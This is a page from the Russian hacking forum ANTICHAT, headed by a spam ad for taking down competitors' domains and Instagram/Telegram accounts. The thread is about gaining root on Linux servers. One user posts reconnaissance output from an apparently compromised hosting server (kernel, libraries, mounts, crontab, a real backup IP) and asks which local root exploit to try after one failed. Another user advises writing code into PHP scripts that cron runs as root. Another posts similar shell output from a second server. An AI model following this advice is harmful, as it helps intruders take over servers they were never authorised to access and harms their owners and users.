УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Повышение прав [задай вопрос - получи ответ]

Страница 21 из 74

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#201

09.01.2012, 22:16

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

У кого есть, скомпилированный этот сплоит, а то у меня что-то не выходит. Поделитесь, заранее спасибо

http://www.securitylab.ru/poc/extra/370448.php

#202

10.01.2012, 15:14

morgan black

Guest

Сообщений: n/a

Провел на форуме:
3750

Репутация: 0

uname -a

Цитата:

Сообщение от None

Linux 2.6.35.7-grsec #1 SMP Sat Nov 20 02:14:33 CST 2010 x86_64 x86_64 x86_64 GNU/Linux

ls -la /boot

Цитата:

Сообщение от None

total 33543
drwxr-xr-x 4 root root 1024 May 11 2011 .
drwxr-xr-x 33 root root 4096 Dec 28 08:25 ..
-rw-r--r-- 1 root root 1188555 Apr 1 2009 System.map-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 1188481 Jan 21 2009 System.map-2.6.18-128.el5
-rw-r--r-- 1 root root 1664845 Dec 30 2009 System.map-2.6.31.9-grsec
-rw-r--r-- 1 root root 1852342 Nov 20 2010 System.map-2.6.35.7-grsec
-rwxr--r-- 1 root root 6144 Nov 6 2009 aquota.user
lrwxrwxrwx 1 root root 2 Nov 6 2009 boot -> ..
-rw-r--r-- 1 root root 64998 Apr 1 2009 config-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 64994 Jan 21 2009 config-2.6.18-128.el5
-rw-r--r-- 1 root root 47720 Dec 30 2009 config-2.6.31.9-grsec
-rw-r--r-- 1 root root 55462 Nov 20 2010 config-2.6.35.7-grsec
drwxr-xr-x 2 root root 1024 Nov 25 2010 grub
-rw------- 1 root root 2650442 Apr 20 2009 initrd-2.6.18-128.1.6.el5.img
-rw------- 1 root root 2602997 Apr 20 2009 initrd-2.6.18-128.el5.img
-rw------- 1 root root 2275460 Jan 26 2010 initrd-2.6.31.9grsec.img
-rw------- 1 root root 2317251 Nov 25 2010 initrd-2.6.35.7-grsec.img
drwx------ 2 root root 12288 Apr 20 2009 lost+found
-rw-r--r-- 1 root root 80032 Mar 16 2009 message
-rwxr--r-- 1 root root 32 Nov 6 2009 quota.user
-rw-r--r-- 1 root root 102182 Apr 1 2009 symvers-2.6.18-128.1.6.el5.gz
-rw-r--r-- 1 root root 102182 Jan 21 2009 symvers-2.6.18-128.el5.gz
-rwxr-xr-x 1 root root 3586662 Dec 30 2009 vmlinux-2.6.31.9-grsec.bz2
-rwxr-xr-x 1 root root 3838217 Nov 20 2010 vmlinux-2.6.35.7-grsec.bz2
-rw-r--r-- 1 root root 1888636 Apr 1 2009 vmlinuz-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 1889308 Jan 21 2009 vmlinuz-2.6.18-128.el5
-rw-r--r-- 1 root root 3237824 Dec 30 2009 vmlinuz-2.6.31.9-grsec
-rw-r--r-- 1 root root 3453904 Nov 20 2010 vmlinuz-2.6.35.7-grsec

ls -la --full-time /lib/lib*

Цитата:

Сообщение от None

-rwxr-xr-x 1 root root 7664 2011-11-28 11:28:47.000000000 -0600 /lib/libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2011-11-28 21:53:42.000000000 -0600 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 16704 2011-11-28 11:28:47.000000000 -0600 /lib/libSegFault.so
lrwxrwxrwx 1 root root 15 2010-05-14 22:01:27.000000000 -0500 /lib/libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 24144 2010-01-26 16:57:13.000000000 -0600 /lib/libacl.so.1.1.0
-rwxr-xr-x 1 root root 14128 2011-11-28 11:28:47.000000000 -0600 /lib/libanl-2.5.so
lrwxrwxrwx 1 root root 13 2011-11-28 21:53:42.000000000 -0600 /lib/libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 18 2010-01-13 13:27:54.000000000 -0600 /lib/libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 907328 2009-01-20 21:47:23.000000000 -0600 /lib/libasound.so.2.0.0
lrwxrwxrwx 1 root root 16 2009-11-06 22:46:05.000000000 -0600 /lib/libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 14296 2007-01-05 23:12:05.000000000 -0600 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2011-04-08 22:01:34.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 95740 2011-03-05 19:22:55.000000000 -0600 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2011-04-08 22:01:34.000000000 -0500 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 54832 2011-03-05 19:22:55.000000000 -0600 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root 15 2011-09-13 21:58:26.000000000 -0500 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 36708 2011-07-22 00:04:15.000000000 -0500 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 1693812 2011-11-28 11:28:47.000000000 -0600 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-11-28 21:53:42.000000000 -0600 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 2009-11-06 22:46:06.000000000 -0600 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 13:15:10.000000000 -0500 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2011-11-28 11:28:47.000000000 -0600 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-11-28 21:53:42.000000000 -0600 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-09-13 21:58:26.000000000 -0500 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2011-07-22 00:04:15.000000000 -0500 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2011-11-28 11:28:47.000000000 -0600 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-11-28 21:53:42.000000000 -0600 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-08-13 20:43:56.000000000 -0500 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2009-11-06 22:46:11.000000000 -0600 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2011-09-13 21:58:27.000000000 -0500 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 838860 2007-01-06 23:37:48.000000000 -0600 /lib/libdb-4.1.so
-rwxr-xr-x 1 root root 934132 2007-01-06 23:37:48.000000000 -0600 /lib/libdb-4.2.so
-rwxr-xr-x 1 root root 1010204 2010-07-12 11:11:02.000000000 -0500 /lib/libdb-4.3.so
-rwxr-xr-x 1 root root 905704 2007-01-06 23:37:48.000000000 -0600 /lib/libdb_cxx-4.1.so
-rwxr-xr-x 1 root root 1019472 2007-01-06 23:37:48.000000000 -0600 /lib/libdb_cxx-4.2.so
lrwxrwxrwx 1 root root 18 2011-09-13 21:59:35.000000000 -0500 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 253392 2011-08-11 12:33:53.000000000 -0500 /lib/libdbus-1.so.3.4.0
-r--r--r-- 1 root root 42988 2011-07-22 00:43:06.000000000 -0500 /lib/libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2011-09-13 21:58:26.000000000 -0500 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 17548 2011-07-22 00:43:10.000000000 -0500 /lib/libdevmapper-event.so.1.02
-r--r--r-- 1 root root 469522 2011-07-22 00:43:01.000000000 -0500 /lib/libdevmapper.a
lrwxrwxrwx 1 root root 20 2011-09-13 21:58:26.000000000 -0500 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 151964 2011-07-22 00:43:10.000000000 -0500 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root 20668 2011-11-28 11:28:47.000000000 -0600 /lib/libdl-2.5.so
lrwxrwxrwx 1 root root 12 2011-11-28 21:53:42.000000000 -0600 /lib/libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 13 2011-09-13 21:58:26.000000000 -0500 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 20192 2011-07-22 00:04:15.000000000 -0500 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2010-09-12 21:53:30.000000000 -0500 /lib/libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x 1 root root 133184 2010-09-07 10:37:44.000000000 -0500 /lib/libexpat.so.0.5.0
lrwxrwxrwx 1 root root 16 2011-09-13 21:58:26.000000000 -0500 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 113860 2011-07-22 00:04:15.000000000 -0500 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root 45192 2011-07-22 03:11:54.000000000 -0500 /lib/libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2011-09-13 21:58:29.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 23 2009-11-06 22:46:06.000000000 -0600 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 644472 2009-03-24 20:52:17.000000000 -0500 /lib/libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:06.000000000 -0600 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 11396 2009-03-24 20:52:17.000000000 -0500 /lib/libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:11.000000000 -0600 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 259128 2009-03-24 20:52:17.000000000 -0500 /lib/libgobject-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:05.000000000 -0600 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 14660 2009-03-24 20:52:17.000000000 -0500 /lib/libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 27964 2007-03-14 22:26:22.000000000 -0500 /lib/libiw.so.28
-rwxr-xr-x 1 root root 6404 2007-01-06 01:57:38.000000000 -0600 /lib/libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2009-11-06 22:46:05.000000000 -0600 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
-rwxr-xr-x 1 root root 216544 2011-11-28 11:28:47.000000000 -0600 /lib/libm-2.5.so
lrwxrwxrwx 1 root root 11 2011-11-28 21:53:42.000000000 -0600 /lib/libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 109740 2011-11-28 11:28:47.000000000 -0600 /lib/libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2011-11-28 21:53:42.000000000 -0600 /lib/libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 36416 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 825028 2010-05-13 06:02:40.000000000 -0500 /lib/libnss_db-2.2.so
lrwxrwxrwx 1 root root 16 2010-05-14 22:01:30.000000000 -0500 /lib/libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root 21948 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 50848 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 22764 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 3208544 2011-10-31 08:18:04.000000000 -0500 /lib/libnss_ldap-2.5.so
lrwxrwxrwx 1 root root 18 2011-11-01 22:51:48.000000000 -0500 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
-rwxr-xr-x 1 root root 46536 2011-11-28 11:28:48.000000000 -0600 /lib/libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root 55804 2011-11-28 11:28:48.000000000 -0600 /lib/libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 21 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 16 2010-11-01 21:54:26.000000000 -0500 /lib/libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root 43020 2010-11-01 16:32:19.000000000 -0500 /lib/libpam.so.0.81.5
lrwxrwxrwx 1 root root 21 2010-11-01 21:54:26.000000000 -0500 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 8624 2010-11-01 16:32:19.000000000 -0500 /lib/libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 17 2010-11-01 21:54:26.000000000 -0500 /lib/libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root 9868 2010-11-01 16:32:19.000000000 -0500 /lib/libpamc.so.0.81.0
-rwxr-xr-x 1 root root 137908 2011-11-28 11:28:48.000000000 -0600 /lib/libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 80636 2011-11-28 11:28:48.000000000 -0600 /lib/libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2011-11-28 21:53:42.000000000 -0600 /lib/libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 48156 2011-11-28 11:28:48.000000000 -0600 /lib/librt-2.5.so
lrwxrwxrwx 1 root root 12 2011-11-28 21:53:42.000000000 -0600 /lib/librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 91892 2011-03-05 22:51:56.000000000 -0600 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 243928 2010-03-31 03:26:18.000000000 -0500 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 12 2011-09-13 21:58:26.000000000 -0500 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 19008 2011-07-22 00:04:15.000000000 -0500 /lib/libss.so.2.0
-rwxr-xr-x 1 root root 291556 2011-08-13 20:43:56.000000000 -0500 /lib/libssl.so.0.9.8e
lrwxrwxrwx 1 root root 11 2009-11-06 22:46:06.000000000 -0600 /lib/libssl.so.4 -> libssl.so.6
lrwxrwxrwx 1 root root 16 2011-09-13 21:58:27.000000000 -0500 /lib/libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 19 2009-11-06 22:46:05.000000000 -0600 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 11636 2007-01-06 07:01:17.000000000 -0600 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 33852 2011-11-28 11:28:48.000000000 -0600 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2011-11-28 21:53:42.000000000 -0600 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 13492 2011-11-28 11:28:48.000000000 -0600 /lib/libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-11-28 21:53:42.000000000 -0600 /lib/libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-09-13 21:58:26.000000000 -0500 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 14472 2011-07-22 00:04:15.000000000 -0500 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root 22 2011-11-14 21:51:38.000000000 -0600 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 37032 2011-11-14 04:43:31.000000000 -0600 /lib/libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 16 2009-11-06 15:17:36.000000000 -0600 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 31344 2009-09-21 17:37:30.000000000 -0500 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root 13 2011-09-13 21:59:07.000000000 -0500 /lib/libz.so -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2011-09-13 21:58:26.000000000 -0500 /lib/libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75120 2011-05-11 05:57:17.000000000 -0500 /lib/libz.so.1.2.3

mount

Цитата:

Сообщение от None

/dev/sda5 on / type ext3 (rw,noatime,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sda1 on /boot type ext2 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
69.175.104.234:/backup/cl65 on /backup type nfs (rw,nfsvers=3,tcp,hard,intr,rsize=32768,wsize=3276 8,addr=69.175.104.234)

df -h

Цитата:

Сообщение от None

Filesystem Size Used Avail Use% Mounted on
/dev/sda5 878G 708G 126G 85% /
none 4.0G 0 4.0G 0% /dev/shm
/dev/sda1 130M 35M 95M 27% /boot
/usr/tmpDSK 2.0G 619M 1.3G 34% /tmp
69.175.104.234:/backup/cl65
2.7T 2.3T 310G 89% /backup

cat /etc/issue

Цитата:

Сообщение от None

This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

cat /etc/crontab

Цитата:

Сообщение от None

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

run-parts

Цитата:

Сообщение от None

01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
* * * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.php > /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null

cat /proc/version

Цитата:

Сообщение от None

Linux version 2.6.35.7-grsec (root@testserver.justhost.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Sat Nov 20 02:14:33 CST 2010

cat /proc/sys/vm/mmap_min_addr

Цитата:

Сообщение от None

65536

pwd

Цитата:

Сообщение от None

/home/rentino1/public_html/img/weather

Пробовал Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) - не помогло. Некоторые другое эксплоиты не компилировались из-за ошибок в исходнике.

Что можете ещё посоветовать под это ядро?

#203

10.01.2012, 23:29

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

morgan black, ну тут я вижу вариант, если есть права на редактирование

Цитата:

Сообщение от None

* * * * * root /usr/bin/php -c /var/server_monitor/php.ini
/var/server_monitor/summary.php
> /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini
/var/server_monitor/summary.daily.php
> /dev/null

можешь туда вписать свой код, и выполнить его от рута.

#204

11.01.2012, 00:47

morgan black

Guest

Сообщений: n/a

Провел на форуме:
3750

Репутация: 0

Цитата:

Сообщение от Expl0ited

Expl0ited said:
morgan black
, ну тут я вижу вариант, если есть права на редактирование
можешь туда вписать свой код, и выполнить его от рута.

Увы, прав на запись нет Больше ничего нельзя сделать?

#205

11.01.2012, 00:51

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от morgan black

morgan black said:
Увы, прав на запись нет
Больше ничего нельзя сделать?

Нет.

#206

11.01.2012, 15:01

Unknown

Guest

Сообщений: n/a

Провел на форуме:
23035

Репутация: 5

sh-3.1$ uname -a

Linux ********* 2.6.18-028stab070.10 #1 SMP Thu Oct 21 13:44:25 MSD 2010 i686 GNU/Linux

sh-3.1$ ls -la /boot

total 8

drwxr-xr-x 2 root root 4096 Sep 29 2008 .

drwxr-xr-x 21 root root 4096 Jan 8 12:29 ..

sh-3.1$ ls -la --full-time /lib/lib*

-rw-r--r-- 1 root root 5448 2009-01-17 12:58:51.000000000 +0100 /lib/libBrokenLocale-2.3.6.so

lrwxrwxrwx 1 root root 24 2009-06-28 21:55:57.000000000 +0200 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.3.6.so

-rw-r--r-- 1 root root 13652 2009-01-17 12:58:52.000000000 +0100 /lib/libSegFault.so

lrwxrwxrwx 1 root root 15 2006-07-21 01:40:39.000000000 +0200 /lib/libacl.so.1 -> libacl.so.1.1.0

-rw-r--r-- 1 root root 22156 2006-07-21 01:40:44.000000000 +0200 /lib/libacl.so.1.1.0

-rw-r--r-- 1 root root 9868 2009-01-17 12:58:51.000000000 +0100 /lib/libanl-2.3.6.so

lrwxrwxrwx 1 root root 15 2009-06-28 21:55:57.000000000 +0200 /lib/libanl.so.1 -> libanl-2.3.6.so

lrwxrwxrwx 1 root root 15 2005-03-19 03:26:50.000000000 +0100 /lib/libatm.so.1 -> libatm.so.1.0.0

-rw-r--r-- 1 root root 34768 2005-03-19 03:26:50.000000000 +0100 /lib/libatm.so.1.0.0

lrwxrwxrwx 1 root root 16 2006-03-28 07:25:02.000000000 +0200 /lib/libattr.so.1 -> libattr.so.1.1.0

-rw-r--r-- 1 root root 12840 2006-03-28 07:25:06.000000000 +0200 /lib/libattr.so.1.1.0

lrwxrwxrwx 1 root root 15 2007-12-06 20:57:45.000000000 +0100 /lib/libblkid.so.1 -> libblkid.so.1.0

-rw-r--r-- 1 root root 32248 2007-12-06 20:57:51.000000000 +0100 /lib/libblkid.so.1.0

lrwxrwxrwx 1 root root 15 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1 -> libbz2.so.1.0.3

lrwxrwxrwx 1 root root 15 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1.0 -> libbz2.so.1.0.3

-rw-r--r-- 1 root root 66200 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1.0.3

-rwxr-xr-x 1 root root 1147548 2009-01-17 12:58:52.000000000 +0100 /lib/libc-2.3.6.so

lrwxrwxrwx 1 root root 13 2009-06-28 21:55:57.000000000 +0200 /lib/libc.so.6 -> libc-2.3.6.so

lrwxrwxrwx 1 root root 14 2004-04-14 00:10:43.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10

-rw-r--r-- 1 root root 11024 2004-04-14 00:10:45.000000000 +0200 /lib/libcap.so.1.10

lrwxrwxrwx 1 root root 17 2006-09-05 18:26:18.000000000 +0200 /lib/libcfont.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 10644 2006-09-05 18:26:20.000000000 +0200 /lib/libcfont.so.0.0.0

-rw-r--r-- 1 root root 181684 2009-01-17 12:58:52.000000000 +0100 /lib/libcidn-2.3.6.so

lrwxrwxrwx 1 root root 16 2009-06-28 21:55:57.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.3.6.so

lrwxrwxrwx 1 root root 17 2007-12-06 20:57:44.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 5820 2007-12-06 20:57:50.000000000 +0100 /lib/libcom_err.so.2.1

lrwxrwxrwx 1 root root 19 2006-09-05 18:26:18.000000000 +0200 /lib/libconsole.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 73540 2006-09-05 18:26:20.000000000 +0200 /lib/libconsole.so.0.0.0

-rw-r--r-- 1 root root 21868 2009-01-17 12:58:52.000000000 +0100 /lib/libcrypt-2.3.6.so

lrwxrwxrwx 1 root root 17 2009-06-28 21:55:57.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so

lrwxrwxrwx 1 root root 19 2006-09-05 18:26:18.000000000 +0200 /lib/libctutils.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 18380 2006-09-05 18:26:20.000000000 +0200 /lib/libctutils.so.0.0.0

lrwxrwxrwx 1 root root 15 2006-02-14 23:06:32.000000000 +0100 /lib/libdb.so.2 -> libdb1-2.2.5.so

-rw-r--r-- 1 root root 55052 2006-02-14 23:06:32.000000000 +0100 /lib/libdb1-2.2.5.so

lrwxrwxrwx 1 root root 15 2006-02-14 23:06:32.000000000 +0100 /lib/libdb1.so.2 -> libdb1-2.2.5.so

-rw-r--r-- 1 root root 65332 2006-08-09 00:39:02.000000000 +0200 /lib/libdevmapper.so.1.02

-rw-r--r-- 1 root root 9592 2009-01-17 12:58:52.000000000 +0100 /lib/libdl-2.3.6.so

lrwxrwxrwx 1 root root 14 2009-06-28 21:55:57.000000000 +0200 /lib/libdl.so.2 -> libdl-2.3.6.so

lrwxrwxrwx 1 root root 13 2007-12-06 20:57:45.000000000 +0100 /lib/libe2p.so.2 -> libe2p.so.2.3

-rw-r--r-- 1 root root 19132 2007-12-06 20:57:51.000000000 +0100 /lib/libe2p.so.2.3

lrwxrwxrwx 1 root root 16 2007-12-06 20:57:45.000000000 +0100 /lib/libext2fs.so.2 -> libext2fs.so.2.4

-rw-r--r-- 1 root root 102892 2007-12-06 20:57:51.000000000 +0100 /lib/libext2fs.so.2.4

-rw-r--r-- 1 root root 41096 2006-12-10 15:45:12.000000000 +0100 /lib/libgcc_s.so.1

lrwxrwxrwx 1 root root 17 2006-12-19 16:51:31.000000000 +0100 /lib/libhistory.so.5 -> libhistory.so.5.2

-rw-r--r-- 1 root root 26444 2006-12-19 16:51:33.000000000 +0100 /lib/libhistory.so.5.2

-rw-r--r-- 1 root root 141040 2009-01-17 12:58:52.000000000 +0100 /lib/libm-2.3.6.so

lrwxrwxrwx 1 root root 13 2009-06-28 21:55:57.000000000 +0200 /lib/libm.so.6 -> libm-2.3.6.so

-rw-r--r-- 1 root root 13644 2009-01-17 12:58:52.000000000 +0100 /lib/libmemusage.so

lrwxrwxrwx 1 root root 17 2006-10-19 13:02:19.000000000 +0200 /lib/libncurses.so.5 -> libncurses.so.5.5

-rw-r--r-- 1 root root 263040 2006-10-19 13:02:31.000000000 +0200 /lib/libncurses.so.5.5

lrwxrwxrwx 1 root root 18 2006-10-19 13:02:21.000000000 +0200 /lib/libncursesw.so.5 -> libncursesw.so.5.5

-rw-r--r-- 1 root root 308288 2006-10-19 13:02:32.000000000 +0200 /lib/libncursesw.so.5.5

-rw-r--r-- 1 root root 72452 2009-01-17 12:58:52.000000000 +0100 /lib/libnsl-2.3.6.so

lrwxrwxrwx 1 root root 15 2009-06-28 21:55:57.000000000 +0200 /lib/libnsl.so.1 -> libnsl-2.3.6.so

-rw-r--r-- 1 root root 26332 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_compat-2.3.6.so

lrwxrwxrwx 1 root root 22 2009-06-28 21:55:57.000000000 +0200 /lib/libnss_compat.so.2 -> libnss_compat-2.3.6.so

-rw-r--r-- 1 root root 17840 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_dns-2.3.6.so

lrwxrwxrwx 1 root root 19 2009-06-28 21:55:57.000000000 +0200 /lib/libnss_dns.so.2 -> libnss_dns-2.3.6.so

-rw-r--r-- 1 root root 34276 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_files-2.3.6.so

lrwxrwxrwx 1 root root 21 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_files.so.2 -> libnss_files-2.3.6.so

-rw-r--r-- 1 root root 17856 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_hesiod-2.3.6.so

lrwxrwxrwx 1 root root 22 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.3.6.so

